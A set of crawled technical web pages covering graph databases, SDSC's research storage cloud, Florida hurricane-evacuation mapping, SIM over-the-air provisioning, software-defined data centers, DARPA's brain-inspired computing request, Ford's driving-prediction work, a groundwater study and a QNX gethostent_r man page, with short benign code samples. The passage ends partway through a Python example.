IP-Surveillance is a term for a security system that gives users the ability to monitor and record video and/or audio over an IP (Internet Protocol-based) computer network such as a local area network (LAN) or the Internet. In a simple IP-Surveillance system, this involves the use of a network camera (or an analog camera with a video encoder/video server), a network switch, a PC for viewing, managing and storing video, and video management software.

Download this guide below to read more.
<urn:uuid:0f5630a9-a7ba-4edd-9500-fcb0fad6b84f>
CC-MAIN-2017-04
http://www.bsminfo.com/doc/ip-surveillance-design-guide-0001
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00490-ip-10-171-10-70.ec2.internal.warc.gz
en
0.833295
244
2.609375
3
Graph databases use graph structures (a finite set of ordered pairs of certain entities), with edges, properties and nodes, for data storage. They provide index-free adjacency, meaning that every element is directly linked to its neighbour element, so no index lookups are necessary. Graph databases are faster than relational databases when it comes to associative data sets. Because they do not need join operations, they can scale naturally to large data sets.

Gephi helps people understand and explore graphs and patterns. It uses a 3D engine to show graphs in real time, which can help users form hypotheses and isolate structural singularities or faults during data sourcing. It is written in Java on the NetBeans platform. It can be used to analyse graphs extracted from OrientDB.

FlockDB is a simple graph database intended for online, low-latency, high-throughput environments such as websites. FlockDB is used by Twitter to store social graphs. It is a distributed graph database and can support complex arithmetic queries. The database is licensed under the Apache License.

GraphBuilder can reveal hidden structures in big data, as it can construct graphs out of large data sets. Developed by Intel and built in Java, it uses Hadoop and scales using the MapReduce parallel processing model. The GraphBuilder library takes care of many of the difficulties of graph construction, such as graph transformation, formation and compression.

InfoGrid is developed in Java, and at its heart lies the GraphDatabase. It offers many additional software components that make it easy to develop graph-based web applications. InfoGrid is sponsored by NetMesh, which also offers commercial support for using InfoGrid.

InfiniteGraph helps users ask more complex and deeper questions across their data stores. It can work with massive amounts of distributed data, and projects that need more than one server will benefit the most from this graph database. It offers high-speed graph traversals, scalability and parallel consumption of data.

Gremlin is a graph traversal language that can be used for graph analysis, query and manipulation. Gremlin works with graph databases that implement the Blueprints property graph data model; these include, among others, Neo4j, OrientDB and InfiniteGraph. Gremlin provides native support for Java and Groovy.

HyperGraphDB is a general-purpose data storage mechanism designed for knowledge representation. It is based on directed hypergraphs and offers graph-oriented storage. It can be used as an embedded object-oriented database for Java projects or as a (non-SQL) relational database. The core of the database engine is designed for generalized, typed and directed hypergraphs.

GraphBase is a graph database management system that was built from scratch in order to manage large graphs. It makes huge, highly structured data stores possible. GraphBase simplifies the use of graph-structured data, replacing very complex, spaghetti-like structures. With GraphBase Singleview, it becomes possible to turn a database into a single, searchable and navigable graph.

BrightstarDB Mobile and Embedded are the open-source tools of BrightstarDB, a NoSQL database designed for the .NET platform that is fast, embeddable and scalable. It does not need a fixed schema, which gives it a lot of flexibility in what data is stored and how. Its associative data model fits naturally with real-world applications.
Sparksee (formerly known as DEX) makes space and performance compatible with a small footprint and fast analysis of large networks. It is natively available for .NET, C++, Python and Java, and covers the whole spectrum of operating systems. Sparksee Mobile is the first graph database available for iOS and Android.

Neo4j is a graph database boasting massive performance improvements versus relational databases. It is very agile and fast. At the moment it is used by many startups in applications such as social platforms, fraud detection and recommendation engines. The data is stored in nodes that are connected by directed, typed relationships, with properties on both (a property graph).
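Several of the tools above (Neo4j, OrientDB, InfiniteGraph) can be queried with Gremlin, so a short traversal is the most concrete way to show what join-free, associative querying looks like. The sketch below is illustrative only: it uses the gremlinpython client, and the server endpoint, the 'person' label and the 'knows' edge label are all assumptions, not details from this article.

from gremlin_python.process.anonymous_traversal import traversal
from gremlin_python.driver.driver_remote_connection import DriverRemoteConnection

# Connect to a Gremlin Server; the endpoint is a placeholder.
conn = DriverRemoteConnection('ws://localhost:8182/gremlin', 'g')
g = traversal().withRemote(conn)

# Friends-of-friends of Alice: each hop follows edges directly
# (index-free adjacency), with no join operation anywhere.
names = (g.V().has('person', 'name', 'Alice')
          .out('knows')     # first hop: direct friends
          .out('knows')     # second hop: friends of friends
          .dedup()
          .values('name')
          .toList())
print(names)
conn.close()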
<urn:uuid:c9d2748e-5680-401a-bc71-a389ae06745f>
CC-MAIN-2017-04
https://datafloq.com/big-data-open-source-tools/os-graph-databases/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00490-ip-10-171-10-70.ec2.internal.warc.gz
en
0.94238
832
2.875
3
Last month, the San Diego Supercomputer Center launched what it believes is "the largest academic-based cloud storage system in the U.S." The infrastructure is designed to serve the country's research community and will be available to scientists and engineers from essentially any government agency that needs to archive and share super-sized data sets. Certainly the need for such a service exists. The modern practice of science is a community activity and the way researchers collaborate is by sharing their data. Before the emergence of the cloud, the main way to accomplish that was via emails and sending manuscripts back and forth over the internet. But with the coalescence of some old and new technologies, there are now economically viable ways for sharing really large amounts of data with colleagues. In the press release describing the storage cloud, SDSC director Michael Norman described it thusly: "We believe that the SDSC Cloud may well revolutionize how data is preserved and shared among researchers, especially massive datasets that are becoming more prevalent in this new era of data-intensive research and computing." Or as he told us more succinctly, "I think of it as Flickr for scientific data." It's not just for university academics. Science projects under the DOE, NIH, NASA, and other US agencies are all welcome. Even though the center is underwritten by the NSF, it gets large amounts of funding and researchers from all of those organizations. Like most NSF-supported HPC centers today, SDSC is a multi-agency hub. Norman says that the immediate goal of this project is to support the current tape archive customers at SDSC with something that allows for data sharing. For collaboration, he says, tape archive is probably the worst possible solution. Not only is the I/O bandwidth too low, but with a tape platform, there is always a computer standing between you and your data. With a disk-based cloud solution, you automatically get higher bandwidth, but more importantly, a web interface for accessing data. Every data file is provided a unique URL, making the information globally accessible from any web client. "It can talk to your iPhone as easily as it can talk to your mainframe," says Norman. The initial cloud infrastructure consists of 5.5 petabytes of disk capacity linked to servers via a couple of Arista Networks 7508 switches, which provide 10 terabits/second of connectivity. Dell R610 nodes are used for the storage servers, as well as for load balancing and proxy servers. The storage hardware is made up of Supermicro SC847E26 JBODs, with each JBOD housing 45 3TB Seagate disks. All of this infrastructure is housed and maintained at SDSC. The cloud storage will replace the current tape archive at the center, in this case a StorageTek system that currently holds about a petabyte of user data spread across 30 or 40 projects. Over the next 12 to 18 months, SDSC will migrate the data, along with their customers, over to the cloud and mothball the StorageTek hardware. According to Norman, some of these tape users would like to move other data sets into these archives and the cloud should make that process a lot smoother. "We are setting this up as a sustainable business and hope to have customers who use our cloud simply as a preservation environment," he says. For example, they're already talking with a NASA center that is looking to park their mission data somewhere accessible, but in an archive-type environment. The move to a storage cloud was not all locally motivated, however.
Government agencies like the NSF and NIH began mandating data sharing plans for all research projects. Principal investigators (PIs) can allocate up to 5 percent of their grant funding for data storage, but as it turns out, on a typical five- or six-figure research grant, that's not very much money. In order for such data sharing to be economically viable to researchers, it basically has to be a cost-plus model. Norman thinks they have achieved that with their pricing model, although he admits that "if you asked researchers what would be the right price, it would be zero." For 100 GB of storage, rates are $3.25/month for University of California (UC) users, $5.66/month for UC affiliates and $7.80/month for customers outside the UC sphere. Users who are looking for a big chunk of storage in excess of 200TB will need to pay for the extra infrastructure, in what the program refers to as its "micro-condo" offering. The condo pricing scheme is more complex, but is offered to users with really large datasets and for research grants that include storage considerations for proposals and budgeting. And even though this model doesn't provide for a transparently elastic cloud, the condo model at least makes the infrastructure expandable. According to Norman, their cloud is designed to scale up into the hundreds-of-petabytes realm. Although data owners pay for capacity, thanks to government-supported science networks, data consumers don't pay for I/O bandwidth. Wide-area networks under projects such as CENIC (Corporation for Education Network Initiatives in California), ESnet (Energy Sciences Network), and XSEDE (Extreme Science and Engineering Discovery Environment) are public investments that can be leveraged by SDSC's cloud. That can be a huge advantage over commercial storage clouds like Amazon's Simple Storage Service (S3), where users have to account for data transfer costs. While some researchers may end up using commercial offerings like Amazon S3, Norman thinks those types of setups generally don't cater to academic types and are certainly not part of most researchers' mindsets. They are also missing some of the high-performance networking enabled by big 10GbE pipes and low-latency switching at SDSC. Whether the center's roll-your-own cloud will be able to compete against commercial clouds on a long-term basis remains to be seen. One of the reasons a relatively small organization like SDSC can even build such a beast today is thanks in large part to the availability of cheap commodity hardware and the native expertise at the center to build high-end storage systems from parts. There is also OpenStack — an open-source cloud OS that SDSC is using as the basis of its offering. Besides being essentially free for the taking, the non-proprietary nature of OpenStack also means the center will not be locked into any particular software or hardware vendors down the road. "With OpenStack going open source, it's now possible for anybody to set up a little cloud business," explains Norman. "We're just doing it in an academic environment."
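Because the SDSC Cloud is built on OpenStack object storage, every object is addressable by URL and sharing reduces to handing out links. Here is a minimal sketch of what consuming such an archive could look like; the hostname and object path are invented placeholders, not real SDSC URLs.

import urllib.request

# Swift-style object URL: /v1/<account>/<container>/<object>.
# This hostname and path are hypothetical.
url = 'https://cloud.sdsc.example/v1/AUTH_lab/climate/run42.nc'

# A world-readable object needs no auth token, so any web client --
# a phone as easily as a mainframe -- can fetch it.
with urllib.request.urlopen(url) as resp:
    data = resp.read()
print(f'fetched {len(data)} bytes')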
<urn:uuid:b3a6b20a-f3e2-44e6-88c8-52b7f369163b>
CC-MAIN-2017-04
https://www.hpcwire.com/2011/10/06/sdsc_s_new_storage_cloud_flickr_for_scientific_data_/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00334-ip-10-171-10-70.ec2.internal.warc.gz
en
0.950484
1,420
3.078125
3
Having information readily available before a disaster or storm can be invaluable for first responders and emergency managers tasked with organizing the response. The Florida Coastal Mapping project is an effort that combines data collection with disaster preparedness by collecting LIDAR data — which uses light detection to capture information — for coastal counties; running the data through a computerized model to estimate storm surge depths from hurricanes; and using the information to develop new regional evacuation plans. In Florida, many regions' hurricane evacuation studies haven't been updated since the 1990s, according to the Florida Division of Emergency Management's (FDEM) website. The agency plans to use the new information gathered from the mapping project to refresh the State Regional Evacuation Studies by the end of the year. "The State Regional Evacuation Studies will be used by every emergency management entity in Florida as the basis for developing evacuation and protective measure plans, shelter planning and identifying coastal high hazards zones," FDEM spokeswoman Lauren McKeague wrote in an e-mail. "Additionally the studies will be used by all the state's growth management agencies to identify impacts to public safety plans and to address growth management standards put in place by the Florida Legislature, including traffic and other future land use planning." The new LIDAR data will also be available to other agencies in need of quality land contour data, according to McKeague. Betti Johnson, principal planner with the Tampa Bay Regional Planning Council, said the effort has provided the region with additional information to aid its evacuation planning. "We had looked at kind of the average hurricanes — average forward speed, average size. So we didn't look at a Hurricane Dennis or a Hurricane Ike that were so much larger," Johnson said. "Whereas in 2006, we had 735 hypothetical storms in our suite of storms that we looked at, this time we had 12,000. So there was a lot more information to incorporate." The more detailed information enlarged some of the region's areas that are expected to be vulnerable to Category 4 and 5 hurricanes. The information has also been incorporated into the council's public outreach efforts, she said. The next step is for the local emergency managers to incorporate data from the mapping project into their planning. The information can be run through the Sea, Lake and Overland Surges from Hurricanes (SLOSH) computerized model that evaluates the threats from a hurricane storm surge and tells officials which areas need to be evacuated. SLOSH can use data from previous or predicted hurricanes, including a storm's pressure, size, forward speed and forecast track, as well as wind speeds and topographical data. The studies have been funded with $26 million in general fund revenue as well as FEMA grants from the 2004-2005 hurricane season. On Oct. 5, the West Florida Evacuation Study was presented to emergency managers in the region. The state has also started reviewing the South Florida transportation analysis, and the American Red Cross has begun reviewing the data collected with regard to the location of proposed evacuation shelters.
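The article names SLOSH's inputs but not its interface. As a rough illustration of how those parameters fit together, here is a hypothetical Python structure for one model scenario; the field names and units are invented for illustration and are not taken from the actual SLOSH software.

from dataclasses import dataclass

@dataclass
class SloshScenario:
    # Storm parameters named in the article; units are assumptions.
    central_pressure_mb: float   # lower pressure means a stronger storm
    radius_max_winds_km: float   # storm size
    forward_speed_kts: float
    track: list                  # forecast track as (lat, lon) points
    max_winds_kts: float

# A hypothetical Category 4 scenario approaching Tampa Bay.
scenario = SloshScenario(
    central_pressure_mb=935.0,
    radius_max_winds_km=45.0,
    forward_speed_kts=12.0,
    track=[(24.5, -83.0), (26.1, -82.9), (27.8, -82.6)],
    max_winds_kts=130.0,
)
print(scenario)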
<urn:uuid:187be51e-6fd1-431d-8ad9-2e575a6a8528>
CC-MAIN-2017-04
http://www.govtech.com/geospatial/Florida-Updating-Regional-Evacuation-Studies-With-Mapping-Project-Data.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282140.72/warc/CC-MAIN-20170116095122-00452-ip-10-171-10-70.ec2.internal.warc.gz
en
0.946096
637
2.921875
3
OTA (Over-The-Air) is a technology used to communicate with, download applications to, and manage a SIM card without being connected physically to the card.

OTA enables a Network Operator to introduce new SIM services or to modify the contents of SIM cards in a rapid and cost-effective way. OTA is based on a client/server architecture where at one end there is an operator back-end system (customer care, billing system, application server ...) and at the other end there is a SIM card. The operator's back-end system sends service requests to an OTA Gateway which transforms the requests into Short Messages and sends them on to a Short Message Service Centre (SMSC) which transmits them to one or several SIM cards in the field. Thus, Over-The-Air (OTA) is a technology that updates and changes data in the SIM card without having to reissue it. Indeed, the end user can receive special messages from the operator, download or activate new services on his telephone, and much more, without having to return to a retail outlet. In order to implement OTA technology, the following components are needed:

- A back-end system to send requests
- An OTA Gateway to process the requests into a format understandable to the SIM card
- An SMSC to send requests through the wireless network
- A bearer to transport the request: today it is the SMS bearer
- Mobile equipment to receive the request and transmit it to the SIM card
- A SIM card to receive and execute the request

Back-end System

The back-end system can be anything from a customer care operator to a billing system, a content provider or a subscriber web interface. The provisioning system has to be connected to the mobile network (either per LAN or via the Internet). Service requests contain the service requested (activate, deactivate, load, modify ...), the subscriber targeted and the data to perform the service. The back-end system then sends out service requests to the OTA Gateway.

The OTA Gateway

The OTA Gateway receives service requests through a Gateway API that will indicate the actual card to modify/update/activate. In fact, inside the OTA Gateway there is a card database that indicates, for each card, the SIM vendor (Gemalto, Schlumberger, DeLaRue ...), the card's identification number, the IMSI and the MSISDN. The second step is to format the service request into a message that can be understood by the recipient SIM card. To achieve this, the OTA Gateway has a set of libraries that contain the formats to use for each brand of SIM card. The OTA Gateway then formats the message differently depending on the recipient card. The third step consists in sending the formatted message to the SMSC using the right set of parameters as described in GSM 03.48. The OTA Gateway issues as many SMS as required to fulfill the service request. In this step the OTA Gateway is also responsible for the integrity and security of the process.

The SMSC

The SMSC is the services center for short messages (SMS) exchanged between the message management system (the OTA Gateway) and the cellular network. A message consisting of a maximum of 160 alphanumeric characters can be sent to or from a mobile phone. If the mobile phone is powered off or has left the coverage area, the message is stored and offered back to the subscriber when the mobile is powered on or has reentered the coverage area of the network. The communication between the SIM card and the OTA Gateway can be done by SMS exchange, in which case it is named the SMS channel; the mobile equipment has to be phase 2+ in the GSM standard.
Mobile Equipment

The mobile phone has all the required features for handling part or all of the standardized GSM services. Regarding OTA services, the mobile phone has to be SIM Toolkit compliant.

The SIM Card

Smart cards provide secure user authentication and are mainly used in the GSM standard as Subscriber Identity Modules (SIM cards). The SIM is the major component of the GSM market, paving the way to value-added services. SIM cards now offer new menus, prerecorded numbers for speed dialing, and the ability to send preformatted short messages (SMS) to query a database or secure transactions.
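To make the request path concrete (back end to gateway to SMSC to SIM), here is a schematic Python sketch. Every function name and message format in it is invented for illustration; real OTA traffic is wrapped in GSM 03.48 secured packets, which are omitted here.

# Schematic sketch of the OTA request path; all names are invented.

def split_into_sms(payload, size=140):
    # An SMS user-data field carries roughly 140 bytes of binary data.
    return [payload[i:i + size] for i in range(0, len(payload), size)]

def format_for_card(request, card):
    # The gateway consults its card database (vendor, IMSI, MSISDN)
    # and encodes the request in that vendor's format. Real gateways
    # also add GSM 03.48 security headers; omitted here.
    body = f"{request['action']}:{request['data']}".encode()
    return card['msisdn'], body

def send_service_request(request, card, smsc_submit):
    msisdn, body = format_for_card(request, card)
    for chunk in split_into_sms(body):
        smsc_submit(msisdn, chunk)   # the SMSC delivers each SMS to the SIM

# Example: activate a new SIM menu entry for one subscriber.
card = {'msisdn': '+15551234567', 'imsi': '001010123456789'}
send_service_request({'action': 'ACTIVATE', 'data': 'news-menu'},
                     card,
                     lambda msisdn, sms: print(msisdn, sms))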
<urn:uuid:98ecf303-a0ad-4cbc-8217-4a1bb563ecf3>
CC-MAIN-2017-04
http://www.gemalto.com/techno/ota/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00178-ip-10-171-10-70.ec2.internal.warc.gz
en
0.907082
876
2.578125
3
The software defined data center (SDDC) is a natural evolution of virtualization, extending it beyond virtual machines on a server to virtual networks, virtual storage, and new automated management tools with similar benefits to traditional virtualization. The term was first coined by VMware CTO Steve Herrod in 2012. In an SDDC, all physical infrastructure is treated as one resource that can be divided as needed, rather than split up by individual servers, switches, routers, hard drives, storage bays, and so on. Software and services are installed on an abstracted layer on top of data center hardware to manage virtual networks, virtualized servers, and virtual storage. All of this allows security and network settings to be integrated with and attached to each virtual machine, and the simplified management also makes tasks like backup, archiving, and application deployment much faster. Software defined infrastructure further increases efficient use of available resources, increasing utilization of physical hardware and reducing both capital and operational expense. In a software defined data center, customers can self-provision a virtual data center, specifying their required resources, network devices, and storage. The management of physical infrastructure will come from policy-driven software, defined by data center operators in accordance with service level agreements (SLAs).

Software Defined Networks

Software defined networking (SDN) uses software to manage all network devices as a single resource, allowing load balancing, firewalls, VPNs, and more to be attached to individual virtual machines. These settings then move with the virtual machine as it communicates via the network. The virtual components are "logical" rather than physical: when two VMs are connected through a logical switch, the data transferred between them must filter through these rules before crossing the physical network. SDN decouples the control system that decides where to send data packets from the data system that physically transfers the packets. The physical location of network devices no longer defines network activity. Instead, software controls network settings and can be placed anywhere, on any server. Each virtual network is isolated from other networks and the physical hardware, and there can practically be an infinite number of them, limited only by the resources of the server on which they are hosted and the network infrastructure through which traffic must pass. SDN supports overlapping IP addresses, which is ideal for testing and development, as individual security and network settings do not need to be set up and configured for each stage of the development and testing process. These settings were previously programmed into physical hardware – switches and routers.

Software Defined Storage

Software defined storage (SDS), much like SDN, treats the available pool of storage resources (often a storage area network (SAN) of fast, connected storage devices) as a single resource rather than individual drives and arrays. Management software then allows smart provisioning of storage on demand by virtual machines. With virtualized storage, systems from multiple vendors can be managed as a single unit.

Automation and Management Possibilities

The software defined data center enables new possibilities for flexible, on-demand provisioning of virtual infrastructure.
Users can launch pooled resources customized to specific application requirements, while the underlying hardware is utilized nearer to 100% of its capabilities. Every virtual network launched by a customer would exist in the same data center, but have its own security, firewall, and authentication requirements. When combined with data center infrastructure management (DCIM) software and protocols, an SDDC can be much more efficiently managed. As customers provision their own data centers, automatic rules control what resources are used when, and everything is tracked and monitored for granular insight and control. The bottom line? Less downtime, more energy savings, and more resources available. Posted By: Joe Kozlowicz
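As a rough illustration of the self-provisioning idea, where compute, storage, and network rules are requested as one declarative unit, here is a hypothetical specification in Python. The field names are invented; real SDDC stacks express this through their own APIs or templates.

from dataclasses import dataclass, field

@dataclass
class VirtualDataCenter:
    # Everything the customer asks for travels together as one spec,
    # so firewall and storage policy follow the VMs wherever they run.
    name: str
    vcpus: int
    memory_gb: int
    storage_gb: int
    firewall_rules: list = field(default_factory=list)
    sla_uptime: float = 99.9   # drives the policy layer, per the SLA

vdc = VirtualDataCenter(
    name='dev-test',
    vcpus=16,
    memory_gb=64,
    storage_gb=500,
    firewall_rules=['allow tcp 443 from any', 'deny all'],
)
print(vdc)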
<urn:uuid:e732d7da-9fa2-4325-afb0-fd07bdfd73e0>
CC-MAIN-2017-04
https://www.greenhousedata.com/blog/what-are-software-defined-data-centers-networks-and-storage
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280730.27/warc/CC-MAIN-20170116095120-00572-ip-10-171-10-70.ec2.internal.warc.gz
en
0.916633
754
3.4375
3
In the never-ending quest to get computers to process, really understand and actually reason, scientists at the Defense Advanced Research Projects Agency want to look more deeply into how computers can mimic a key portion of our brain. The military's advanced research group recently put out a call, or Request for Information (RFI), on how it could develop systems that go beyond machine learning, Bayesian techniques, and graphical technology to solve "extraordinarily difficult recognition problems in real-time." Current systems offer partial solutions to this problem, but are limited in their ability to efficiently scale to larger, more complex datasets, DARPA said. "They are also compute intensive, exhibit limited parallelism, require high precision arithmetic, and, in most cases, do not account for temporal data." What DARPA is interested in is mimicking a portion of the brain known as the neocortex, which is utilized in higher brain functions such as sensory perception, motor commands, spatial reasoning, conscious thought and language. Specifically, DARPA said it is looking for information that provides new concepts and technologies for developing what it calls a "Cortical Processor" based on Hierarchical Temporal Memory. "Although a thorough understanding of how the cortex works is beyond current state of the art, we are at a point where some basic algorithmic principles are being identified and merged into machine learning and neural network techniques. Algorithms inspired by neural models, in particular neocortex, can recognize complex spatial and temporal patterns and can adapt to changing environments. Consequently, these algorithms are a promising approach to data stream filtering and processing and have the potential for providing new levels of performance and capabilities for a range of data recognition problems," DARPA stated. "The cortical computational model should be fault tolerant to gaps in data, massively parallel, extremely power efficient, and highly scalable. It should also have minimal arithmetic precision requirements, and allow ultra-dense, low power implementations." Some of the questions DARPA is looking to answer include:
- What are the capabilities and limitations of HTM-like algorithms for addressing real large-scale applications?
- What algorithm or algorithms would a cortical processor execute?
- What opportunities are there for significant improvements in power efficiency and speed that can be achieved by leveraging recent advances in dense memory structures, such as multi-level floating gates, processors in memory, or 3D integration?
- What is the best trade-off between flexibility (or configurability) and performance?
- Is it possible to build specialized architectures that demonstrate sufficient performance, price and power advantages over mainline commercial silicon to justify their design and construction?
- What new capabilities could a cortical processor enable that would result in a new level of application performance?
- What entirely new applications might be possible if a cortical processor were available to you?
- What type of metric could be used for measuring performance and suitability to task?
The new RFI is only part of the research and development DARPA has been doing to build what it calls a new kind of computer with similar form and function to the mammalian brain. Such artificial brains would be used to build robots whose intelligence matches that of mice and cats, DARPA says.
Recently IBM said it created DARPA-funded prototype chips that could mimic brain-like actions. The prototype chips will give computers mind-like abilities to make decisions by collating and analyzing immense amounts of data, similar to humans gathering and understanding a series of events, Dharmendra Modha, project leader for IBM Research, told the IDG News Service. The experimental chips, modeled around neural systems, mimic the brain's structure and operation through silicon circuitry and advanced algorithms. IBM hopes reverse-engineering the brain into a chip could forge computers that are highly parallel, event-driven and passive on power consumption, Modha said. The machines will be a sharp departure from modern computers, which have scaling limitations and require set programming by humans to generate results. Like the brain, IBM's prototype chips can dynamically rewire to sense, understand and act on information fed via sight, hearing, taste, smell and touch, or through other sources such as weather and water-supply monitors. The chips will help discover patterns based on probabilities and associations, all while rivaling the brain's compact size and low power usage, Modha said.
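HTM-style models operate on sparse distributed representations (SDRs), and recognition reduces largely to counting which bits two patterns share. The toy Python illustration below shows only that overlap idea; it is not DARPA's, IBM's or Numenta's actual cortical algorithm.

import random

N, ACTIVE = 2048, 40   # HTM-like sizes: 2048 bits, about 2% active

def random_sdr():
    # An SDR is a large, mostly-zero bit vector; we store only the on-bits.
    return set(random.sample(range(N), ACTIVE))

def overlap(a, b):
    # Shared on-bits measure similarity; a little noise barely moves it.
    return len(a & b)

pattern = random_sdr()
noisy = set(list(pattern)[:-5]) | set(random.sample(range(N), 5))
unrelated = random_sdr()
print('noisy copy overlap:', overlap(pattern, noisy))      # high (35+)
print('unrelated overlap: ', overlap(pattern, unrelated))  # near 0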
<urn:uuid:78b7f3f5-4ea1-4422-9362-e4e6523313da>
CC-MAIN-2017-04
http://www.networkworld.com/article/2225201/servers/darpa-wants-computers-that-fuse-with-higher-human-brain-function.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279923.28/warc/CC-MAIN-20170116095119-00022-ip-10-171-10-70.ec2.internal.warc.gz
en
0.937483
898
3.171875
3
Ford is leveraging Google's Prediction API to model driving behavior based on driving history. The idea is to optimize fuel and/or power consumption by guessing routes. Ford Motor Company is using Google's Prediction API to improve energy efficiency in its cars, the company said. The Prediction API is a tool developers can use to, for example, write applications that recommend content such as movies or target key customers. The tool leverages Google's massive cloud of servers and storage. At Google I/O in San Francisco May 11, Ford said the API could be used to gauge driver behavior and tune car controls to boost fuel or power efficiency. Specifically, Ford is using the prediction software to study driving history, including where a driver has traveled and at what time of day, over the prior two-year period. Using this driving history, which would be completely voluntary, Ford believes it will be able to divine where a driver is headed at the time of his or her departure. The motor vehicle maker said it will be able to enable the car to "optimize itself" for the route, thus preserving fuel and/or power. Ryan McGee, technical expert of vehicle controls architecture and algorithm design for Ford Research and Innovation, explained how this works at I/O, albeit on a screen slide show rather than an actual vehicle. When a vehicle owner opts in to use the service, an encrypted driver data usage profile is built based on routes and time of day. When a driver starts the car, Google Prediction software will compare the driver's historical driving behavior with the current time of day and location to predict the most likely destination and how to optimize driving performance to and from that location. Then, an on-board computer might ask the driver if he or she is going to work. If the driver replied in the affirmative, the car's computer would kick in a powertrain control strategy for the trip. For example, a predicted route could include an area restricted to electric-only driving, whereupon a plug-in hybrid vehicle could program itself to prescribe energy usage over the total distance of the route in order to preserve enough battery power to switch to all-electric mode when required. In addition to being useful for electric and hybrid vehicles, Ford said it could be used for vehicles operating in "low emission zones," where electric and low-emission vehicles would be allowed to ride in certain zones. The idea, currently being tested in London, Stockholm and Berlin, is designed to preserve the environment and cut down on traffic. If a vehicle could predict exactly when it might be entering such a zone, it could program itself to comply with regulations, such as switching the engine to all-electric mode. How the Prediction API would play with Ford's current Sync navigation and traffic information system, which also leverages the cloud to facilitate communication between vehicles, computers and drivers, is unclear. Ford's embrace of Google's Prediction API comes one year after rival General Motors at Google I/O 2010 added navigation features for its Chevrolet Volt application that help users track their vehicles on Google Maps and search for destinations from Android smartphones.
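The behavior described, guessing the destination from history plus the current time and origin, can be illustrated with a trivial frequency model. This sketch is an invented stand-in, not Ford's system and not the (since-retired) Google Prediction API.

from collections import Counter, defaultdict

# Two years of trips, reduced to (weekday, hour, origin, destination).
history = [
    ('Mon', 8, 'home', 'work'), ('Tue', 8, 'home', 'work'),
    ('Wed', 8, 'home', 'gym'),  ('Thu', 8, 'home', 'work'),
]

model = defaultdict(Counter)
for day, hour, start, dest in history:
    model[(hour, start)][dest] += 1   # bucket trips by hour and origin

def predict(hour, start):
    # Most frequent destination for this context, if we've seen it before.
    seen = model.get((hour, start))
    return seen.most_common(1)[0][0] if seen else None

# A weekday 8am departure from home is probably 'work'; the car could
# then preplan its powertrain strategy for that route.
print(predict(8, 'home'))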
<urn:uuid:aacb432a-a6a9-43d2-8083-fb239925b6f1>
CC-MAIN-2017-04
http://www.eweek.com/c/a/Application-Development/Ford-Uses-Google-Prediction-API-to-Build-Smarter-Cars-547542
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281001.53/warc/CC-MAIN-20170116095121-00169-ip-10-171-10-70.ec2.internal.warc.gz
en
0.924866
668
2.796875
3
Purushothaman P., National Institute of Hydrology | Someshwar Rao M., National Institute of Hydrology | Kumar B., National Institute of Hydrology | Rawat Y.S., National Institute of Hydrology | And 7 more authors. International Journal of Earth Sciences and Engineering | Year: 2012 The physical and chemical parameters of groundwater play a significant role in classifying and assessing water quality. Hydrochemical study reveals the quality of water that is suitable for irrigation, agriculture, drinking and industrial purposes. In this study, groundwater samples from different aquifers (shallow, medium and deep) were collected and analysed for major ions. The analysed samples were used for classifying water type, source and quality for irrigation purposes. The major ionic abundances in the area show the trends Ca++ > Mg++ > Na+ > K+ (shallow and medium aquifers), Na+ > Ca++ > Mg++ > K+ (deep aquifer) and HCO3- > Cl- > SO4--. The dominant hydrochemical facies in the shallow and medium aquifers is the CaMgHCO3 type, and in the deep aquifer the NaHCO3 type. The drinking water quality is very good, and the water quality for irrigation is good in the study area. The study reveals that there is a chance of precipitation of carbonate minerals, which may pose a risk to soils in the study area. © 2012 CAFET-INNOVA TECHNICAL SOCIETY. Source
<urn:uuid:514a1d79-8164-48b0-a0d2-70265a3c691f>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/central-groundwater-board-north-western-region-1649315/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280485.79/warc/CC-MAIN-20170116095120-00041-ip-10-171-10-70.ec2.internal.warc.gz
en
0.882978
306
2.984375
3
Read the next line of the host database file

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

struct hostent * gethostent_r( FILE ** hostf, struct hostent * result, char * buffer, int buflen, int * h_errnop );

- hostf: NULL, or the address of the FILE * pointer associated with the host database file.
- result: A pointer to a struct hostent where the function can store the host entry.
- buffer: A pointer to a buffer that the function can use during the operation to store host database entries; buffer should be large enough to hold all of the data associated with the host entry. A 2K buffer is usually more than enough; a 256-byte buffer is safe in most cases.
- buflen: The length of the area pointed to by buffer.
- h_errnop: A pointer to a location where the function can store an h_errno value if an error occurs.

Use the -l socket option to qcc to link against this library.

The gethostent_r() function is a thread-safe version of the gethostent() function. This function reads the next entry from the host database. If the pointer pointed to by hostf is NULL, gethostent_r() opens /etc/hosts and returns its file pointer in hostf for later use. It's the calling process's responsibility to close the host file with fclose(). The first time that you call gethostent_r(), pass NULL in the pointer pointed to by hostf.

Returns: a pointer to result, or NULL if an error occurs. If an error occurs, the int pointed to by h_errnop is set to one of:

- The supplied buffer isn't large enough to store the result.
- HOST_NOT_FOUND: Authoritative answer: Unknown host.
- NO_ADDRESS: No address associated with name, look for an MX record.
- NO_DATA: Valid name, no data record of the requested type. The name is known to the name server, but has no IP address associated with it—this isn't a temporary error. Another type of request to the name server using this domain name will result in an answer (e.g. a mail-forwarder may be registered for this domain).
- NO_RECOVERY: Unknown server error. An unexpected server failure was encountered. This is a nonrecoverable network error.
- TRY_AGAIN: Nonauthoritative answer: Host name lookup failure. This is usually a temporary error and means that the local server didn't receive a response from an authoritative server. A retry at some later time may succeed.

/etc/hosts: Local host database file.

Last modified: 2014-06-24
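As a rough cross-language illustration of what gethostent()-style iteration does (walk /etc/hosts entry by entry), here is a Python sketch. It only mimics the behavior and is not a binding to the C function.

def host_entries(path='/etc/hosts'):
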